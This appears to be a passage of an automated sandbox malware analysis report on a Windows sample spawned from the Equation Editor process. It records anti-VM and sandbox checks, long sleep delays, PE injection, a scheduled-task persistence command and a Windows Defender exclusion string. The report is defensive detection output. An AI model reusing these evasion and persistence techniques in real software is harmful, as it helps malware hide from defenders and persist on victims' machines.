                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.243d308.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.newapp.exe.22cd29c.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.216d29c.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.505779927.0000000002161000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.413432114.0000000002431000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: edufyrigefy4utwgqeoriufj4ce.exe PID: 1184, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 2852, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.413432114.0000000002431000.00000004.00000001.sdmp, newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.413432114.0000000002431000.00000004.00000001.sdmp, newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2636Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe TID: 2640Thread sleep time: -37852s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe TID: 2640Thread sleep time: -40000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe TID: 2652Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe TID: 2044Thread sleep time: -420000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe TID: 2600Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe TID: 2600Thread sleep time: -120000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2524Thread sleep time: -34373s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2524Thread sleep time: -40000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2532Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2420Thread sleep time: -360000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2588Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2588Thread sleep time: -90000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1848Thread sleep count: 553 > 30
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1848Thread sleep count: 3560 > 30
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2588Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1704Thread sleep time: -35914s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1704Thread sleep time: -40000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2644Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2540Thread sleep time: -240000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2168Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2168Thread sleep time: -150000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2840Thread sleep count: 9574 > 30
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2840Thread sleep count: 162 > 30
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2168Thread sleep count: 106 > 30
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWindow / User API: threadDelayed 9680
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 553
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 3560
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 9574
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeThread delayed: delay time: 37852
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeThread delayed: delay time: 40000
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 34373
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 40000
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 35914
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 40000
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 30000
                      Source: newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: newapp.exe, 00000008.00000002.484160274.00000000056B0000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeMemory written: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory written: C:\Users\user\AppData\Roaming\newapp\newapp.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory written: C:\Users\user\AppData\Roaming\newapp\newapp.exe base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7B0A.tmp'
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC63.tmp'
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp10D3.tmp'
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.664498063.0000000001030000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.664498063.0000000001030000.00000002.00020000.sdmpBinary or memory string: !Progman
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.664498063.0000000001030000.00000002.00020000.sdmpBinary or memory string: Program Manager<
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeQueries volume information: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeQueries volume information: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
